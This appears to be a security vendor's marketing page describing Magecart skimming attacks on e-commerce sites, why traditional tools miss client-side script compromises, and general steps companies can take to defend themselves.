Digital Skimming and Magecart

Why Every E-commerce Website is Vulnerable to a Magecart Attack

Magecart Attacks Are On the Rise

Magecart Attacks Are On the Rise

Magecart Attacks Are On the Rise

Millions of users and hundreds of thousands of websites have already been compromised by Magecart digital skimming attacks. Between May 2019 and July 2019 alone, 960+ e-commerce stores, 17,000 domains, 200+ online bookstores, and well-known brands like Forbes, Garmin and the American Cancer Society were breached.

These cybercriminals are on the hunt for users’ payment card data so they can sell it to other cybercriminals on the dark web for a profit. Magecart attacks are growing more sophisticated and relentless. Our research has uncovered multiple Magecart groups attacking the same site simultaneously. These cybercriminals don’t discriminate between company size, influence, industry or wealth, which means any company with an e-commerce shop as part of its website is vulnerable.

Client-side is the New Blind Spot

Unlike other cybercriminals, Magecart groups skim payment card data directly from the client-side, where traditional security solutions aren’t looking. With the user experience (UX) now a critical competitive differentiator, core logic in modern web applications has shifted from server-side processing to client-side JavaScript libraries to enable rich functionality and to optimize performance. This change has increased the attack surface and created significant security and privacy risk.

Developers once had full accountability for website source code. Today 70% of the client-side code on most websites is comprised of third-party scripts. Even first-party scripts developed in-house make extensive use of open-source libraries. There are more opportunities than ever for attackers to inject malicious code into the client side in order to steal, tamper and hijack user data and payment card information.

Such data breaches can cause significant brand damage, customer churn and a drop in online revenue for an e-commerce business. Customers are much less likely to return to a website that leaked their credit card numbers and may abandon that brand forever. The business can also be exposed to regulatory penalties and financial liabilities. British Airways paid a $229M fine for GDPR violations resulting from a Magecart attack and may be exposed to millions more in liability claims from pending lawsuits.

Regardless of what method Magecart cybercriminals use, a breach can go undetected for weeks, even months, resulting in millions of users’ data getting exposed.

Magecart Timeline

Traditional Security Solutions Can’t Protect Against Magecart Attacks

Magecart attacks go undetected because threats have evolved faster than corporate application security measures. Traditional security solutions aren’t designed to track and monitor client-side code at run time, but rather to prevent attacks to the back-end infrastructure. For example:

  • Web Application Firewalls (WAFs) can only defend against inbound threats to first-party web infrastructure.
  • Content Security Policies (CSPs) can identify trusted third parties but cannot guarantee the integrity of the code.
  • Static scanners do not catch vulnerabilities in real time. Also, code obfuscation techniques can mask attacks from scanners.

Additionally, because website decision makers don’t fully understand the risks from client-side script compromises, they are not making client-side application security a priority. A recent survey conducted by Osterman Research found that 90% of respondents believe that there is only little to moderate risk from these scripts.

Magecart 1st party and 3rd party script and length graph

How Companies Can Protect Themselves

Companies can no longer rely on third parties or partners for protection. Instead, they need to:

Educate: Website owners and security professionals must understand that the client-side of a web application needs protection due to the risks associated with third-party scripts and libraries that may change without your knowledge.

Strategize: Companies need to create a robust and sophisticated client-side security strategy that enables a great user experience without sacrificing the security and privacy of user data.

Implement: Companies need to implement new tools and measures focused on client-side security so they can gain visibility into all script activities and get alerts on suspicious changes. They will then be able to prevent unwanted scripts from accessing users' sensitive data and enforce strict data access policies.

Attackers will continue to exploit zero-day vulnerabilities and security weak points to compromise e-commerce websites through Magecart-style attacks. Businesses are ultimately responsible for protecting their user data and defending their brand reputation. To learn more about client-side security and how your organization can protect itself from Magecart attacks, read our new white paper: “Magecart Attacks: The Biggest Threat to Online Transactions

Forrester Report

PerimeterX Named a Leader in the Forrester Wave™: Bot Management, Q2 2022

Download Report
© PerimeterX, Inc. All rights reserved.